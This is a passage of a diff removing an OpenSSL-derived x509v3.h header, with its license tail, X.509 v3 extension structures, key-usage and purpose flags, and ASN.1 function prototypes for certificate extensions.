- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_X509V3_H
-#define HEADER_X509V3_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/bio.h>
-#include <openssl/x509.h>
-#include <openssl/conf.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Forward reference */
-struct v3_ext_method;
-struct v3_ext_ctx;
-
-/* Useful typedefs */
-
-typedef void * (*X509V3_EXT_NEW)(void);
-typedef void (*X509V3_EXT_FREE)(void *);
-typedef void * (*X509V3_EXT_D2I)(void *, const unsigned char ** , long);
-typedef int (*X509V3_EXT_I2D)(void *, unsigned char **);
-typedef STACK_OF(CONF_VALUE) *
-  (*X509V3_EXT_I2V)(const struct v3_ext_method *method, void *ext,
-		    STACK_OF(CONF_VALUE) *extlist);
-typedef void * (*X509V3_EXT_V2I)(const struct v3_ext_method *method,
-				 struct v3_ext_ctx *ctx,
-				 STACK_OF(CONF_VALUE) *values);
-typedef char * (*X509V3_EXT_I2S)(const struct v3_ext_method *method, void *ext);
-typedef void * (*X509V3_EXT_S2I)(const struct v3_ext_method *method,
-				 struct v3_ext_ctx *ctx, const char *str);
-typedef int (*X509V3_EXT_I2R)(const struct v3_ext_method *method, void *ext,
-			      BIO *out, int indent);
-typedef void * (*X509V3_EXT_R2I)(const struct v3_ext_method *method,
-				 struct v3_ext_ctx *ctx, const char *str);
-
-/* V3 extension structure */
-
-struct v3_ext_method {
-int ext_nid;
-int ext_flags;
-/* If this is set the following four fields are ignored */
-ASN1_ITEM_EXP *it;
-/* Old style ASN1 calls */
-X509V3_EXT_NEW ext_new;
-X509V3_EXT_FREE ext_free;
-X509V3_EXT_D2I d2i;
-X509V3_EXT_I2D i2d;
-
-/* The following pair is used for string extensions */
-X509V3_EXT_I2S i2s;
-X509V3_EXT_S2I s2i;
-
-/* The following pair is used for multi-valued extensions */
-X509V3_EXT_I2V i2v;
-X509V3_EXT_V2I v2i;
-
-/* The following are used for raw extensions */
-X509V3_EXT_I2R i2r;
-X509V3_EXT_R2I r2i;
-
-void *usr_data;	/* Any extension specific data */
-};
-
-typedef struct X509V3_CONF_METHOD_st {
-char * (*get_string)(void *db, char *section, char *value);
-STACK_OF(CONF_VALUE) * (*get_section)(void *db, char *section);
-void (*free_string)(void *db, char * string);
-void (*free_section)(void *db, STACK_OF(CONF_VALUE) *section);
-} X509V3_CONF_METHOD;
-
-/* Context specific info */
-struct v3_ext_ctx {
-#define CTX_TEST 0x1
-int flags;
-X509 *issuer_cert;
-X509 *subject_cert;
-X509_REQ *subject_req;
-X509_CRL *crl;
-X509V3_CONF_METHOD *db_meth;
-void *db;
-/* Maybe more here */
-};
-
-typedef struct v3_ext_method X509V3_EXT_METHOD;
-
-DECLARE_STACK_OF(X509V3_EXT_METHOD)
-
-/* ext_flags values */
-#define X509V3_EXT_DYNAMIC	0x1
-#define X509V3_EXT_CTX_DEP	0x2
-#define X509V3_EXT_MULTILINE	0x4
-
-typedef BIT_STRING_BITNAME ENUMERATED_NAMES;
-
-typedef struct BASIC_CONSTRAINTS_st {
-int ca;
-ASN1_INTEGER *pathlen;
-} BASIC_CONSTRAINTS;
-
-
-typedef struct PKEY_USAGE_PERIOD_st {
-ASN1_GENERALIZEDTIME *notBefore;
-ASN1_GENERALIZEDTIME *notAfter;
-} PKEY_USAGE_PERIOD;
-
-typedef struct otherName_st {
-ASN1_OBJECT *type_id;
-ASN1_TYPE *value;
-} OTHERNAME;
-
-typedef struct EDIPartyName_st {
-	ASN1_STRING *nameAssigner;
-	ASN1_STRING *partyName;
-} EDIPARTYNAME;
-
-typedef struct GENERAL_NAME_st {
-
-#define GEN_OTHERNAME	0
-#define GEN_EMAIL	1
-#define GEN_DNS		2
-#define GEN_X400	3
-#define GEN_DIRNAME	4
-#define GEN_EDIPARTY	5
-#define GEN_URI		6
-#define GEN_IPADD	7
-#define GEN_RID		8
-
-int type;
-union {
-	char *ptr;
-	OTHERNAME *otherName; /* otherName */
-	ASN1_IA5STRING *rfc822Name;
-	ASN1_IA5STRING *dNSName;
-	ASN1_TYPE *x400Address;
-	X509_NAME *directoryName;
-	EDIPARTYNAME *ediPartyName;
-	ASN1_IA5STRING *uniformResourceIdentifier;
-	ASN1_OCTET_STRING *iPAddress;
-	ASN1_OBJECT *registeredID;
-
-	/* Old names */
-	ASN1_OCTET_STRING *ip; /* iPAddress */
-	X509_NAME *dirn;		/* dirn */
-	ASN1_IA5STRING *ia5;/* rfc822Name, dNSName, uniformResourceIdentifier */
-	ASN1_OBJECT *rid; /* registeredID */
-	ASN1_TYPE *other; /* x400Address */
-} d;
-} GENERAL_NAME;
-
-typedef STACK_OF(GENERAL_NAME) GENERAL_NAMES;
-
-typedef struct ACCESS_DESCRIPTION_st {
-	ASN1_OBJECT *method;
-	GENERAL_NAME *location;
-} ACCESS_DESCRIPTION;
-
-typedef STACK_OF(ACCESS_DESCRIPTION) AUTHORITY_INFO_ACCESS;
-
-typedef STACK_OF(ASN1_OBJECT) EXTENDED_KEY_USAGE;
-
-DECLARE_STACK_OF(GENERAL_NAME)
-
-DECLARE_STACK_OF(ACCESS_DESCRIPTION)
-
-typedef struct DIST_POINT_NAME_st {
-int type;
-union {
-	GENERAL_NAMES *fullname;
-	STACK_OF(X509_NAME_ENTRY) *relativename;
-} name;
-/* If relativename then this contains the full distribution point name */
-X509_NAME *dpname;
-} DIST_POINT_NAME;
-/* All existing reasons */
-#define CRLDP_ALL_REASONS	0x807f
-
-#define CRL_REASON_NONE				-1
-#define CRL_REASON_UNSPECIFIED			0
-#define CRL_REASON_KEY_COMPROMISE		1
-#define CRL_REASON_CA_COMPROMISE		2
-#define CRL_REASON_AFFILIATION_CHANGED		3
-#define CRL_REASON_SUPERSEDED			4
-#define CRL_REASON_CESSATION_OF_OPERATION	5
-#define CRL_REASON_CERTIFICATE_HOLD		6
-#define CRL_REASON_REMOVE_FROM_CRL		8
-#define CRL_REASON_PRIVILEGE_WITHDRAWN		9
-#define CRL_REASON_AA_COMPROMISE		10
-
-struct DIST_POINT_st {
-DIST_POINT_NAME	*distpoint;
-ASN1_BIT_STRING *reasons;
-GENERAL_NAMES *CRLissuer;
-int dp_reasons;
-};
-
-typedef STACK_OF(DIST_POINT) CRL_DIST_POINTS;
-
-DECLARE_STACK_OF(DIST_POINT)
-
-struct AUTHORITY_KEYID_st {
-ASN1_OCTET_STRING *keyid;
-GENERAL_NAMES *issuer;
-ASN1_INTEGER *serial;
-};
-
-/* Strong extranet structures */
-
-typedef struct SXNET_ID_st {
-	ASN1_INTEGER *zone;
-	ASN1_OCTET_STRING *user;
-} SXNETID;
-
-DECLARE_STACK_OF(SXNETID)
-
-typedef struct SXNET_st {
-	ASN1_INTEGER *version;
-	STACK_OF(SXNETID) *ids;
-} SXNET;
-
-typedef struct NOTICEREF_st {
-	ASN1_STRING *organization;
-	STACK_OF(ASN1_INTEGER) *noticenos;
-} NOTICEREF;
-
-typedef struct USERNOTICE_st {
-	NOTICEREF *noticeref;
-	ASN1_STRING *exptext;
-} USERNOTICE;
-
-typedef struct POLICYQUALINFO_st {
-	ASN1_OBJECT *pqualid;
-	union {
-		ASN1_IA5STRING *cpsuri;
-		USERNOTICE *usernotice;
-		ASN1_TYPE *other;
-	} d;
-} POLICYQUALINFO;
-
-DECLARE_STACK_OF(POLICYQUALINFO)
-
-typedef struct POLICYINFO_st {
-	ASN1_OBJECT *policyid;
-	STACK_OF(POLICYQUALINFO) *qualifiers;
-} POLICYINFO;
-
-typedef STACK_OF(POLICYINFO) CERTIFICATEPOLICIES;
-
-DECLARE_STACK_OF(POLICYINFO)
-
-typedef struct POLICY_MAPPING_st {
-	ASN1_OBJECT *issuerDomainPolicy;
-	ASN1_OBJECT *subjectDomainPolicy;
-} POLICY_MAPPING;
-
-DECLARE_STACK_OF(POLICY_MAPPING)
-
-typedef STACK_OF(POLICY_MAPPING) POLICY_MAPPINGS;
-
-typedef struct GENERAL_SUBTREE_st {
-	GENERAL_NAME *base;
-	ASN1_INTEGER *minimum;
-	ASN1_INTEGER *maximum;
-} GENERAL_SUBTREE;
-
-DECLARE_STACK_OF(GENERAL_SUBTREE)
-
-struct NAME_CONSTRAINTS_st {
-	STACK_OF(GENERAL_SUBTREE) *permittedSubtrees;
-	STACK_OF(GENERAL_SUBTREE) *excludedSubtrees;
-};
-
-typedef struct POLICY_CONSTRAINTS_st {
-	ASN1_INTEGER *requireExplicitPolicy;
-	ASN1_INTEGER *inhibitPolicyMapping;
-} POLICY_CONSTRAINTS;
-
-/* Proxy certificate structures, see RFC 3820 */
-typedef struct PROXY_POLICY_st
-	{
-	ASN1_OBJECT *policyLanguage;
-	ASN1_OCTET_STRING *policy;
-	} PROXY_POLICY;
-
-typedef struct PROXY_CERT_INFO_EXTENSION_st
-	{
-	ASN1_INTEGER *pcPathLengthConstraint;
-	PROXY_POLICY *proxyPolicy;
-	} PROXY_CERT_INFO_EXTENSION;
-
-PROXY_POLICY *PROXY_POLICY_new(void);
-void PROXY_POLICY_free(PROXY_POLICY *a);
-PROXY_POLICY *d2i_PROXY_POLICY(PROXY_POLICY **a, const unsigned char **in, long len);
-int i2d_PROXY_POLICY(PROXY_POLICY *a, unsigned char **out);
-extern const ASN1_ITEM PROXY_POLICY_it;
-PROXY_CERT_INFO_EXTENSION *PROXY_CERT_INFO_EXTENSION_new(void);
-void PROXY_CERT_INFO_EXTENSION_free(PROXY_CERT_INFO_EXTENSION *a);
-PROXY_CERT_INFO_EXTENSION *d2i_PROXY_CERT_INFO_EXTENSION(PROXY_CERT_INFO_EXTENSION **a, const unsigned char **in, long len);
-int i2d_PROXY_CERT_INFO_EXTENSION(PROXY_CERT_INFO_EXTENSION *a, unsigned char **out);
-extern const ASN1_ITEM PROXY_CERT_INFO_EXTENSION_it;
-
-struct ISSUING_DIST_POINT_st
-	{
-	DIST_POINT_NAME *distpoint;
-	int onlyuser;
-	int onlyCA;
-	ASN1_BIT_STRING *onlysomereasons;
-	int indirectCRL;
-	int onlyattr;
-	};
-
-/* Values in idp_flags field */
-/* IDP present */
-#define	IDP_PRESENT	0x1
-/* IDP values inconsistent */
-#define IDP_INVALID	0x2
-/* onlyuser true */
-#define	IDP_ONLYUSER	0x4
-/* onlyCA true */
-#define	IDP_ONLYCA	0x8
-/* onlyattr true */
-#define IDP_ONLYATTR	0x10
-/* indirectCRL true */
-#define IDP_INDIRECT	0x20
-/* onlysomereasons present */
-#define IDP_REASONS	0x40
-
-#define X509V3_conf_err(val) ERR_asprintf_error_data( \
-			"section:%s,name:%s,value:%s", val->section, \
-			val->name, val->value);
-
-#define X509V3_set_ctx_test(ctx) \
-			X509V3_set_ctx(ctx, NULL, NULL, NULL, NULL, CTX_TEST)
-#define X509V3_set_ctx_nodb(ctx) (ctx)->db = NULL;
-
-#define EXT_BITSTRING(nid, table) { nid, 0, &ASN1_BIT_STRING_it, \
-			0,0,0,0, \
-			0,0, \
-			(X509V3_EXT_I2V)i2v_ASN1_BIT_STRING, \
-			(X509V3_EXT_V2I)v2i_ASN1_BIT_STRING, \
-			NULL, NULL, \
-			table}
-
-#define EXT_IA5STRING(nid) { nid, 0, &ASN1_IA5STRING_it, \
-			0,0,0,0, \
-			(X509V3_EXT_I2S)i2s_ASN1_IA5STRING, \
-			(X509V3_EXT_S2I)s2i_ASN1_IA5STRING, \
-			0,0,0,0, \
-			NULL}
-
-#define EXT_END { -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}
-
-
-/* X509_PURPOSE stuff */
-
-#define EXFLAG_BCONS		0x0001
-#define EXFLAG_KUSAGE		0x0002
-#define EXFLAG_XKUSAGE		0x0004
-#define EXFLAG_NSCERT		0x0008
-
-#define EXFLAG_CA		0x0010
-#define EXFLAG_SI		0x0020  /* Self issued. */
-#define EXFLAG_V1		0x0040
-#define EXFLAG_INVALID		0x0080
-#define EXFLAG_SET		0x0100
-#define EXFLAG_CRITICAL		0x0200
-#define EXFLAG_PROXY		0x0400
-#define EXFLAG_INVALID_POLICY	0x0800
-#define EXFLAG_FRESHEST		0x1000
-#define EXFLAG_SS               0x2000	/* Self signed. */
-
-#define KU_DIGITAL_SIGNATURE	0x0080
-#define KU_NON_REPUDIATION	0x0040
-#define KU_KEY_ENCIPHERMENT	0x0020
-#define KU_DATA_ENCIPHERMENT	0x0010
-#define KU_KEY_AGREEMENT	0x0008
-#define KU_KEY_CERT_SIGN	0x0004
-#define KU_CRL_SIGN		0x0002
-#define KU_ENCIPHER_ONLY	0x0001
-#define KU_DECIPHER_ONLY	0x8000
-
-#define NS_SSL_CLIENT		0x80
-#define NS_SSL_SERVER		0x40
-#define NS_SMIME		0x20
-#define NS_OBJSIGN		0x10
-#define NS_SSL_CA		0x04
-#define NS_SMIME_CA		0x02
-#define NS_OBJSIGN_CA		0x01
-#define NS_ANY_CA		(NS_SSL_CA|NS_SMIME_CA|NS_OBJSIGN_CA)
-
-#define XKU_SSL_SERVER		0x1	
-#define XKU_SSL_CLIENT		0x2
-#define XKU_SMIME		0x4
-#define XKU_CODE_SIGN		0x8
-#define XKU_SGC			0x10
-#define XKU_OCSP_SIGN		0x20
-#define XKU_TIMESTAMP		0x40
-#define XKU_DVCS		0x80
-
-#define X509_PURPOSE_DYNAMIC	0x1
-#define X509_PURPOSE_DYNAMIC_NAME	0x2
-
-typedef struct x509_purpose_st {
-	int purpose;
-	int trust;		/* Default trust ID */
-	int flags;
-	int (*check_purpose)(const struct x509_purpose_st *,
-				const X509 *, int);
-	char *name;
-	char *sname;
-	void *usr_data;
-} X509_PURPOSE;
-
-#define X509_PURPOSE_SSL_CLIENT		1
-#define X509_PURPOSE_SSL_SERVER		2
-#define X509_PURPOSE_NS_SSL_SERVER	3
-#define X509_PURPOSE_SMIME_SIGN		4
-#define X509_PURPOSE_SMIME_ENCRYPT	5
-#define X509_PURPOSE_CRL_SIGN		6
-#define X509_PURPOSE_ANY		7
-#define X509_PURPOSE_OCSP_HELPER	8
-#define X509_PURPOSE_TIMESTAMP_SIGN	9
-
-#define X509_PURPOSE_MIN		1
-#define X509_PURPOSE_MAX		9
-
-/* Flags for X509V3_EXT_print() */
-
-#define X509V3_EXT_UNKNOWN_MASK		(0xfL << 16)
-/* Return error for unknown extensions */
-#define X509V3_EXT_DEFAULT		0
-/* Print error for unknown extensions */
-#define X509V3_EXT_ERROR_UNKNOWN	(1L << 16)
-/* ASN1 parse unknown extensions */
-#define X509V3_EXT_PARSE_UNKNOWN	(2L << 16)
-/* BIO_dump unknown extensions */
-#define X509V3_EXT_DUMP_UNKNOWN		(3L << 16)
-
-/* Flags for X509V3_add1_i2d */
-
-#define X509V3_ADD_OP_MASK		0xfL
-#define X509V3_ADD_DEFAULT		0L
-#define X509V3_ADD_APPEND		1L
-#define X509V3_ADD_REPLACE		2L
-#define X509V3_ADD_REPLACE_EXISTING	3L
-#define X509V3_ADD_KEEP_EXISTING	4L
-#define X509V3_ADD_DELETE		5L
-#define X509V3_ADD_SILENT		0x10
-
-DECLARE_STACK_OF(X509_PURPOSE)
-
-BASIC_CONSTRAINTS *BASIC_CONSTRAINTS_new(void);
-void BASIC_CONSTRAINTS_free(BASIC_CONSTRAINTS *a);
-BASIC_CONSTRAINTS *d2i_BASIC_CONSTRAINTS(BASIC_CONSTRAINTS **a, const unsigned char **in, long len);
-int i2d_BASIC_CONSTRAINTS(BASIC_CONSTRAINTS *a, unsigned char **out);
-extern const ASN1_ITEM BASIC_CONSTRAINTS_it;
-
-SXNET *SXNET_new(void);
-void SXNET_free(SXNET *a);
-SXNET *d2i_SXNET(SXNET **a, const unsigned char **in, long len);
-int i2d_SXNET(SXNET *a, unsigned char **out);
-extern const ASN1_ITEM SXNET_it;
-SXNETID *SXNETID_new(void);
-void SXNETID_free(SXNETID *a);
-SXNETID *d2i_SXNETID(SXNETID **a, const unsigned char **in, long len);
-int i2d_SXNETID(SXNETID *a, unsigned char **out);
-extern const ASN1_ITEM SXNETID_it;
-
-int SXNET_add_id_asc(SXNET **psx, char *zone, char *user, int userlen); 
-int SXNET_add_id_ulong(SXNET **psx, unsigned long lzone, char *user, int userlen); 
-int SXNET_add_id_INTEGER(SXNET **psx, ASN1_INTEGER *izone, char *user, int userlen); 
-
-ASN1_OCTET_STRING *SXNET_get_id_asc(SXNET *sx, char *zone);
-ASN1_OCTET_STRING *SXNET_get_id_ulong(SXNET *sx, unsigned long lzone);
-ASN1_OCTET_STRING *SXNET_get_id_INTEGER(SXNET *sx, ASN1_INTEGER *zone);
-
-AUTHORITY_KEYID *AUTHORITY_KEYID_new(void);
-void AUTHORITY_KEYID_free(AUTHORITY_KEYID *a);
-AUTHORITY_KEYID *d2i_AUTHORITY_KEYID(AUTHORITY_KEYID **a, const unsigned char **in, long len);
-int i2d_AUTHORITY_KEYID(AUTHORITY_KEYID *a, unsigned char **out);
-extern const ASN1_ITEM AUTHORITY_KEYID_it;
-
-PKEY_USAGE_PERIOD *PKEY_USAGE_PERIOD_new(void);
-void PKEY_USAGE_PERIOD_free(PKEY_USAGE_PERIOD *a);
-PKEY_USAGE_PERIOD *d2i_PKEY_USAGE_PERIOD(PKEY_USAGE_PERIOD **a, const unsigned char **in, long len);
-int i2d_PKEY_USAGE_PERIOD(PKEY_USAGE_PERIOD *a, unsigned char **out);
-extern const ASN1_ITEM PKEY_USAGE_PERIOD_it;
-
-GENERAL_NAME *GENERAL_NAME_new(void);
-void GENERAL_NAME_free(GENERAL_NAME *a);
-GENERAL_NAME *d2i_GENERAL_NAME(GENERAL_NAME **a, const unsigned char **in, long len);
-int i2d_GENERAL_NAME(GENERAL_NAME *a, unsigned char **out);
-extern const ASN1_ITEM GENERAL_NAME_it;
-GENERAL_NAME *GENERAL_NAME_dup(GENERAL_NAME *a);
-int GENERAL_NAME_cmp(GENERAL_NAME *a, GENERAL_NAME *b);
-
-
-
-ASN1_BIT_STRING *v2i_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
-				X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
-STACK_OF(CONF_VALUE) *i2v_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
-				ASN1_BIT_STRING *bits,
-				STACK_OF(CONF_VALUE) *extlist);
-
-STACK_OF(CONF_VALUE) *i2v_GENERAL_NAME(X509V3_EXT_METHOD *method, GENERAL_NAME *gen, STACK_OF(CONF_VALUE) *ret);
-int GENERAL_NAME_print(BIO *out, GENERAL_NAME *gen);
-
-GENERAL_NAMES *GENERAL_NAMES_new(void);
-void GENERAL_NAMES_free(GENERAL_NAMES *a);
-GENERAL_NAMES *d2i_GENERAL_NAMES(GENERAL_NAMES **a, const unsigned char **in, long len);
-int i2d_GENERAL_NAMES(GENERAL_NAMES *a, unsigned char **out);
-extern const ASN1_ITEM GENERAL_NAMES_it;
-
-STACK_OF(CONF_VALUE) *i2v_GENERAL_NAMES(X509V3_EXT_METHOD *method,
-		GENERAL_NAMES *gen, STACK_OF(CONF_VALUE) *extlist);
-GENERAL_NAMES *v2i_GENERAL_NAMES(const X509V3_EXT_METHOD *method,
-				 X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
-
-OTHERNAME *OTHERNAME_new(void);
-void OTHERNAME_free(OTHERNAME *a);
-OTHERNAME *d2i_OTHERNAME(OTHERNAME **a, const unsigned char **in, long len);
-int i2d_OTHERNAME(OTHERNAME *a, unsigned char **out);
-extern const ASN1_ITEM OTHERNAME_it;
-EDIPARTYNAME *EDIPARTYNAME_new(void);
-void EDIPARTYNAME_free(EDIPARTYNAME *a);
-EDIPARTYNAME *d2i_EDIPARTYNAME(EDIPARTYNAME **a, const unsigned char **in, long len);
-int i2d_EDIPARTYNAME(EDIPARTYNAME *a, unsigned char **out);
-extern const ASN1_ITEM EDIPARTYNAME_it;
-int OTHERNAME_cmp(OTHERNAME *a, OTHERNAME *b);
-void GENERAL_NAME_set0_value(GENERAL_NAME *a, int type, void *value);
-void *GENERAL_NAME_get0_value(GENERAL_NAME *a, int *ptype);
-int GENERAL_NAME_set0_othername(GENERAL_NAME *gen,
-				ASN1_OBJECT *oid, ASN1_TYPE *value);
-int GENERAL_NAME_get0_otherName(GENERAL_NAME *gen, 
-				ASN1_OBJECT **poid, ASN1_TYPE **pvalue);
-
-char *i2s_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method, ASN1_OCTET_STRING *ia5);
-ASN1_OCTET_STRING *s2i_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method, X509V3_CTX *ctx, char *str);
-
-EXTENDED_KEY_USAGE *EXTENDED_KEY_USAGE_new(void);
-void EXTENDED_KEY_USAGE_free(EXTENDED_KEY_USAGE *a);
-EXTENDED_KEY_USAGE *d2i_EXTENDED_KEY_USAGE(EXTENDED_KEY_USAGE **a, const unsigned char **in, long len);
-int i2d_EXTENDED_KEY_USAGE(EXTENDED_KEY_USAGE *a, unsigned char **out);
-extern const ASN1_ITEM EXTENDED_KEY_USAGE_it;
-int i2a_ACCESS_DESCRIPTION(BIO *bp, ACCESS_DESCRIPTION* a);
-
-CERTIFICATEPOLICIES *CERTIFICATEPOLICIES_new(void);
-void CERTIFICATEPOLICIES_free(CERTIFICATEPOLICIES *a);
-CERTIFICATEPOLICIES *d2i_CERTIFICATEPOLICIES(CERTIFICATEPOLICIES **a, const unsigned char **in, long len);
-int i2d_CERTIFICATEPOLICIES(CERTIFICATEPOLICIES *a, unsigned char **out);
-extern const ASN1_ITEM CERTIFICATEPOLICIES_it;
-POLICYINFO *POLICYINFO_new(void);
-void POLICYINFO_free(POLICYINFO *a);
-POLICYINFO *d2i_POLICYINFO(POLICYINFO **a, const unsigned char **in, long len);
-int i2d_POLICYINFO(POLICYINFO *a, unsigned char **out);
-extern const ASN1_ITEM POLICYINFO_it;
-POLICYQUALINFO *POLICYQUALINFO_new(void);
-void POLICYQUALINFO_free(POLICYQUALINFO *a);
-POLICYQUALINFO *d2i_POLICYQUALINFO(POLICYQUALINFO **a, const unsigned char **in, long len);
-int i2d_POLICYQUALINFO(POLICYQUALINFO *a, unsigned char **out);
-extern const ASN1_ITEM POLICYQUALINFO_it;
-USERNOTICE *USERNOTICE_new(void);
-void USERNOTICE_free(USERNOTICE *a);
-USERNOTICE *d2i_USERNOTICE(USERNOTICE **a, const unsigned char **in, long len);
-int i2d_USERNOTICE(USERNOTICE *a, unsigned char **out);
-extern const ASN1_ITEM USERNOTICE_it;
-NOTICEREF *NOTICEREF_new(void);
-void NOTICEREF_free(NOTICEREF *a);
-NOTICEREF *d2i_NOTICEREF(NOTICEREF **a, const unsigned char **in, long len);
-int i2d_NOTICEREF(NOTICEREF *a, unsigned char **out);
-extern const ASN1_ITEM NOTICEREF_it;
-
-CRL_DIST_POINTS *CRL_DIST_POINTS_new(void);
-void CRL_DIST_POINTS_free(CRL_DIST_POINTS *a);
-CRL_DIST_POINTS *d2i_CRL_DIST_POINTS(CRL_DIST_POINTS **a, const unsigned char **in, long len);
-int i2d_CRL_DIST_POINTS(CRL_DIST_POINTS *a, unsigned char **out);
-extern const ASN1_ITEM CRL_DIST_POINTS_it;
-DIST_POINT *DIST_POINT_new(void);
-void DIST_POINT_free(DIST_POINT *a);
-DIST_POINT *d2i_DIST_POINT(DIST_POINT **a, const unsigned char **in, long len);
-int i2d_DIST_POINT(DIST_POINT *a, unsigned char **out);
-extern const ASN1_ITEM DIST_POINT_it;
-DIST_POINT_NAME *DIST_POINT_NAME_new(void);
-void DIST_POINT_NAME_free(DIST_POINT_NAME *a);
-DIST_POINT_NAME *d2i_DIST_POINT_NAME(DIST_POINT_NAME **a, const unsigned char **in, long len);
-int i2d_DIST_POINT_NAME(DIST_POINT_NAME *a, unsigned char **out);
-extern const ASN1_ITEM DIST_POINT_NAME_it;
-ISSUING_DIST_POINT *ISSUING_DIST_POINT_new(void);
-void ISSUING_DIST_POINT_free(ISSUING_DIST_POINT *a);
-ISSUING_DIST_POINT *d2i_ISSUING_DIST_POINT(ISSUING_DIST_POINT **a, const unsigned char **in, long len);
-int i2d_ISSUING_DIST_POINT(ISSUING_DIST_POINT *a, unsigned char **out);
-extern const ASN1_ITEM ISSUING_DIST_POINT_it;
-
-int DIST_POINT_set_dpname(DIST_POINT_NAME *dpn, X509_NAME *iname);
-
-int NAME_CONSTRAINTS_check(X509 *x, NAME_CONSTRAINTS *nc);
-
-ACCESS_DESCRIPTION *ACCESS_DESCRIPTION_new(void);
-void ACCESS_DESCRIPTION_free(ACCESS_DESCRIPTION *a);
-ACCESS_DESCRIPTION *d2i_ACCESS_DESCRIPTION(ACCESS_DESCRIPTION **a, const unsigned char **in, long len);
-int i2d_ACCESS_DESCRIPTION(ACCESS_DESCRIPTION *a, unsigned char **out);
-extern const ASN1_ITEM ACCESS_DESCRIPTION_it;
-AUTHORITY_INFO_ACCESS *AUTHORITY_INFO_ACCESS_new(void);
-void AUTHORITY_INFO_ACCESS_free(AUTHORITY_INFO_ACCESS *a);
-AUTHORITY_INFO_ACCESS *d2i_AUTHORITY_INFO_ACCESS(AUTHORITY_INFO_ACCESS **a, const unsigned char **in, long len);
-int i2d_AUTHORITY_INFO_ACCESS(AUTHORITY_INFO_ACCESS *a, unsigned char **out);
-extern const ASN1_ITEM AUTHORITY_INFO_ACCESS_it;
-
-extern const ASN1_ITEM POLICY_MAPPING_it;
-POLICY_MAPPING *POLICY_MAPPING_new(void);
-void POLICY_MAPPING_free(POLICY_MAPPING *a);
-extern const ASN1_ITEM POLICY_MAPPINGS_it;
-
-extern const ASN1_ITEM GENERAL_SUBTREE_it;
-GENERAL_SUBTREE *GENERAL_SUBTREE_new(void);
-void GENERAL_SUBTREE_free(GENERAL_SUBTREE *a);
-
-extern const ASN1_ITEM NAME_CONSTRAINTS_it;
-NAME_CONSTRAINTS *NAME_CONSTRAINTS_new(void);
-void NAME_CONSTRAINTS_free(NAME_CONSTRAINTS *a);
-
-POLICY_CONSTRAINTS *POLICY_CONSTRAINTS_new(void);
-void POLICY_CONSTRAINTS_free(POLICY_CONSTRAINTS *a);
-extern const ASN1_ITEM POLICY_CONSTRAINTS_it;
-
-GENERAL_NAME *a2i_GENERAL_NAME(GENERAL_NAME *out,
-			       const X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
-			       int gen_type, char *value, int is_nc);
-
-#ifdef HEADER_CONF_H
-GENERAL_NAME *v2i_GENERAL_NAME(const X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
-			       CONF_VALUE *cnf);
-GENERAL_NAME *v2i_GENERAL_NAME_ex(GENERAL_NAME *out,
-				  const X509V3_EXT_METHOD *method,
-				  X509V3_CTX *ctx, CONF_VALUE *cnf, int is_nc);
-void X509V3_conf_free(CONF_VALUE *val);
-
-X509_EXTENSION *X509V3_EXT_nconf_nid(CONF *conf, X509V3_CTX *ctx, int ext_nid, char *value);
-X509_EXTENSION *X509V3_EXT_nconf(CONF *conf, X509V3_CTX *ctx, char *name, char *value);
-int X509V3_EXT_add_nconf_sk(CONF *conf, X509V3_CTX *ctx, char *section, STACK_OF(X509_EXTENSION) **sk);
-int X509V3_EXT_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section, X509 *cert);
-int X509V3_EXT_REQ_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section, X509_REQ *req);
-int X509V3_EXT_CRL_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section, X509_CRL *crl);
-
-X509_EXTENSION *X509V3_EXT_conf_nid(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-				    int ext_nid, char *value);
-X509_EXTENSION *X509V3_EXT_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-				char *name, char *value);
-int X509V3_EXT_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-			char *section, X509 *cert);
-int X509V3_EXT_REQ_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-			    char *section, X509_REQ *req);
-int X509V3_EXT_CRL_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-			    char *section, X509_CRL *crl);
-
-int X509V3_add_value_bool_nf(char *name, int asn1_bool,
-			     STACK_OF(CONF_VALUE) **extlist);
